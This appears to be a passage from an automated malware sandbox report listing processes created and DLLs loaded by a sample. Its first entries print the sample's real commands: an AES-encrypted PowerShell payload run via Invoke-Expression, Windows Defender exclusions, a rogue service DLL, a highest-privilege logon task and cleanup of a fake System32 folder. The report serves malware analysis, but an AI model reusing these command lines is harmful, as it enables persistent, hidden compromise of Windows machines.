    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f && sc start x338625
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x338625
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
    Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
    Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'c:\windows\system32';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'E:\';"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'F:\';"
    Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dllJump to behavior
    Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usosvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: updatepolicy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: upshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usocoreps.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usoapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: explorerframe.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: thumbcache.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: dataexchange.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: dcomp.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Program Files\7-Zip\7zFM.exeSection loaded: dxcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
